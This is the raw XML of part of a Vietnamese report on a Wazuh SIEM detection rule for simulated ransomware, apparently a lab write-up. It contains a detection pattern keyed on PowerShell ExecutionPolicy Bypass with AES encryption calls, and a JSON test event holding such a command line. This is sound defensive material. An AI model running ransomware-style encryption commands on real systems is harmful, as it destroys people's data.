                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">      &lt;id&gt;T1486&lt;/id&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33B206A9" w14:textId="77777777" w:rsidR="00443EB6" w:rsidRPr="00443EB6" w:rsidRDefault="00443EB6" w:rsidP="00443EB6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00443EB6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">    &lt;/mitre&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FB6559D" w14:textId="77777777" w:rsidR="00443EB6" w:rsidRPr="00443EB6" w:rsidRDefault="00443EB6" w:rsidP="00443EB6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00443EB6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">  &lt;/rule&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="20FF482C" w14:textId="77777777" w:rsidR="00443EB6" w:rsidRPr="00443EB6" w:rsidRDefault="00443EB6" w:rsidP="00443EB6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3E4208D1" w14:textId="7C80752E" w:rsidR="000D3737" w:rsidRDefault="00443EB6" w:rsidP="00443EB6">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00443EB6">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>&lt;/group&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="24ABC96A" w14:textId="56F44BE7" w:rsidR="00D214E3" w:rsidRPr="00D214E3" w:rsidRDefault="00D214E3" w:rsidP="00D214E3">
      <w:pPr>
        <w:spacing w:before="120" w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D214E3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Rule 110380 được xây dựng để phát hiện hành vi PowerShell có dấu hiệu mô phỏng ransomware. Rule kế thừa từ cảnh báo 92029, sau đó kiểm tra command line có đồng thời ExecutionPolicy Bypass và một trong các chuỗi liên quan đến mã hóa như TransformFinalBlock, Cryptography.Aes hoặc RNGCryptoServiceProvider. Khi thỏa điều kiện, Wazuh sinh cảnh báo mức 12, cho thấy mức độ nguy hiểm cao, đồng thời ánh xạ hành vi với MITRE ATT&amp;CK T1059.001 – PowerShell và T1486 – Data Encrypted for Impact. Rule này giúp giảm cảnh báo nhiễu vì không chỉ phát hiện PowerShell, mà còn yêu cầu xuất hiện thêm dấu hiệu mã hóa dữ liệu.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701FD6D2" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_heading=h.k2qopkt79pv9" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="29" w:name="_Toc234664901"/>
      <w:bookmarkEnd w:id="28"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>8. Kiểm tra trên SIEM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="10812689" w14:textId="77777777" w:rsidR="000D3737" w:rsidRDefault="00000000">
      <w:pP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Wazuh phát hiện chuỗi thực thi đáng ngờ khi tệp update-Skill-AI.bat khởi chạy cmd.exe, sau đó gọi tiến trình Python. Custom rule 110380 được kích hoạt và ghi nhận đầy đủ thông tin tiến trình cha và tiến trình con.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7050A886" w14:textId="5A03A99C" w:rsidR="00443EB6" w:rsidRDefault="00443EB6">
      <w:pP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Dùng để test_rule</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04EE6AD9" w14:textId="332B9123" w:rsidR="00443EB6" w:rsidRPr="00443EB6" w:rsidRDefault="00443EB6" w:rsidP="00443EB6">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sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00443EB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="vi-VN"/>
        </w:rPr>
        <w:t>{"win":{"system":{"eventID":"1"},"eventdata":{"image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","parentImage":"C:\\Windows\\System32\\cmd.exe","commandLine":"powershell.exe -NoProfile -ExecutionPolicy Bypass -Command System.Security.Cryptography.Aes TransformFinalBlock"}}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45B00D24" w14:textId="30B1CCBA" w:rsidR="000D3737" w:rsidRDefault="00443EB6">
      <w:pPr>
        <w:spacing w:after="200"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00443EB6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3007D6C2" wp14:editId="62E4579A">
            <wp:extent cx="5733415" cy="3315335"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="16210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3649" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId37"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5733415" cy="3315335"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="000D373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237A3" w14:textId="77777777" w:rsidR="007158DF" w:rsidRDefault="007158DF">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2CAC7DFE" w14:textId="77777777" w:rsidR="007158DF" w:rsidRDefault="007158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Xihei">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FFE2664-FC71-40FC-A706-0EE40FD39042}"/>
    <w:embedBold r:id="rId2" w:fontKey="{469FB707-2E9D-4F36-B5BA-FB95FF793A05}"/>
  </w:font>
  <w:font w:name="Consolas">
    <w:panose1 w:val="020B0609020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="E00006FF" w:usb1="0000FCFF" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
    <w:embedRegular r:id="rId3" w:fontKey="{23622EEA-3535-488E-9A61-70DFDC92F44A}"/>
  </w:font>
  <w:font w:name="Cardo">
    <w:altName w:val="Segoe Print"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>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CF94E895-E7C5-42EC-9724-DB1133D203B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2432C" w14:textId="77777777" w:rsidR="007158DF" w:rsidRDefault="007158DF">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="02503349" w14:textId="77777777" w:rsidR="007158DF" w:rsidRDefault="007158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5CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="00D645CC"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="+"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="STXihei" w:eastAsia="STXihei" w:hAnsi="STXihei" w:hint="eastAsia"/>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5CD4B1F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="05CD4B1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E671F9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="05E671F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137AA0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="08137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FD188A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0FFD1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1A67FB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="101A67F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7574F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="14757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123FB2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="17123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AF1854"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="18AF1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DF5AC3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="18DF5AC3"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="+"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="STXihei" w:eastAsia="STXihei" w:hAnsi="STXihei" w:hint="eastAsi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F0D6A3F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1F0D6A3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45C232C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="245C23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CAE506C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2CAE506C"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="3"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="-"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:eastAsia="Arial"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07832CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="307832C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0926D4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="330926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4014895"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="34014895"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="+"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="STXihei" w:eastAsia="STXihei" w:hAnsi="STXihei"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7D22384"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="37D22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BEB55C2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3BEB5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D430120"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3D430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0332921"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="403329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4E25398"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="44E25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34C512F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="534C51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539B3272"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="539B3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78B4997"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="578B4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B35566E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5B355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F2E2F1D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F2E2F1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03C3513"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="603C3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1CC1878"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="61CC1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8610DD9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="68610DD9"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="+"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="STXihei" w:eastAsia="STXihei" w:hAnsi="STXihei" w:hint="eastAsia"/>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6CB93900"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6CB93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D193142"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6D193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015214B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7015214B"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="+"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="STXihei" w:eastAsia="STXihei" w:hAnsi="STXihei"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4F36B25"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="74F36B25"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="+"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="STXihei" w:eastAsia="STXihei" w:hAnsi="STXihei" w:hint="eastAsia"/>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752B503A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="752B5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57771441">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="2009282126">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1097629550">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="62797173">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="601962198">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1883857675">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="638534066">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1616402633">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="697239777">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1671786771">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="2131900471">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="710224658">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="1193499235">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1654606449">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1341393772">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="715617167">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="1409572359">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="983198302">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="2132819108">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="343484580">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="2051953431">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1341155140">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1761632187">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="2128355275">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="961570868">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="2118137008">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1935243094">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="969937321">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="978654606">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="244341406">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="2111705765">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1201281146">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="782268707">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="13452025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6CB"/>
    <w:rsid w:val="00047790"/>
    <w:rsid w:val="000801B7"/>
    <w:rsid w:val="000813F2"/>
    <w:rsid w:val="00091E90"/>
    <w:rsid w:val="000A68FE"/>
    <w:rsid w:val="000D0C31"/>
    <w:rsid w:val="000D3737"/>
    <w:rsid w:val="000E030C"/>
    <w:rsid w:val="001030E8"/>
    <w:rsid w:val="001112FC"/>
    <w:rsid w:val="00144A0A"/>
    <w:rsid w:val="001C1BBB"/>
    <w:rsid w:val="001C7AEA"/>
    <w:rsid w:val="002D0247"/>
    <w:rsid w:val="003133B1"/>
    <w:rsid w:val="00326D67"/>
    <w:rsid w:val="003501A6"/>
    <w:rsid w:val="00354786"/>
    <w:rsid w:val="00443EB6"/>
    <w:rsid w:val="00461D86"/>
    <w:rsid w:val="004A2DA6"/>
    <w:rsid w:val="004B1B62"/>
    <w:rsid w:val="0053088E"/>
    <w:rsid w:val="00552F82"/>
    <w:rsid w:val="006240D3"/>
    <w:rsid w:val="00654AC6"/>
    <w:rsid w:val="00684681"/>
    <w:rsid w:val="006B64B5"/>
    <w:rsid w:val="006D79AD"/>
    <w:rsid w:val="00712FAC"/>
    <w:rsid w:val="007158DF"/>
    <w:rsid w:val="007D151A"/>
    <w:rsid w:val="007F47BB"/>
    <w:rsid w:val="008059C1"/>
    <w:rsid w:val="00864F6E"/>
    <w:rsid w:val="008A4F40"/>
    <w:rsid w:val="008F2B92"/>
    <w:rsid w:val="009C17E9"/>
    <w:rsid w:val="009D6A35"/>
    <w:rsid w:val="00A33798"/>
    <w:rsid w:val="00A863F1"/>
    <w:rsid w:val="00A95A97"/>
    <w:rsid w:val="00AC2AC8"/>
    <w:rsid w:val="00B0471D"/>
    <w:rsid w:val="00BD7E0F"/>
    <w:rsid w:val="00BF14E2"/>
    <w:rsid w:val="00C4018B"/>
    <w:rsid w:val="00C91D84"/>
    <w:rsid w:val="00D214E3"/>
    <w:rsid w:val="00E126CB"/>
    <w:rsid w:val="00E4063B"/>
    <w:rsid w:val="00E7386E"/>
    <w:rsid w:val="00E751FA"/>
    <w:rsid w:val="00F11B3F"/>
    <w:rsid w:val="00F731B8"/>
    <w:rsid w:val="00FA1CBB"/>
    <w:rsid w:val="00FA499A"/>
    <w:rsid w:val="2B040C3B"/>
    <w:rsid w:val="77AA6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6DE61"/>
  <w15:docId w15:val="{BB4DB973-F26C-4607-B717-CBA3AAC9C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vi"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="400" w:after="120"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="360" w:after="120"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="480" w:after="80"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="280" w:after="80"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="240" w:after="80"/>
      <w:outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>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line="269" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:cstheme="minorBidi"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="24"/>
      <w:lang w:val="vi-VN"/>
    </w:r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link w:val="TitleChar"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:after="60"/>
    </w:pPr>
    <w:rPr>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styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="660"/>
    </w:p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style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style13">
    <w:name w:val="_Style 13"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style14">
    <w:name w:val="_Style 14"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style15">
    <w:name w:val="_Style 15"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style16">
    <w:name w:val="_Style 16"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style17">
    <w:name w:val="_Style 17"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style18">
    <w:name w:val="_Style 18"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style19">
    <w:name w:val="_Style 19"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style20">
    <w:name w:val="_Style 20"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style21">
    <w:name w:val="_Style 21"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style22">
    <w:name w:val="_Style 22"/>
    <w:basedOn w:val="TableNormal0"/>
    <w:qFormat/>
    <w:tblPr/>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="Style23">
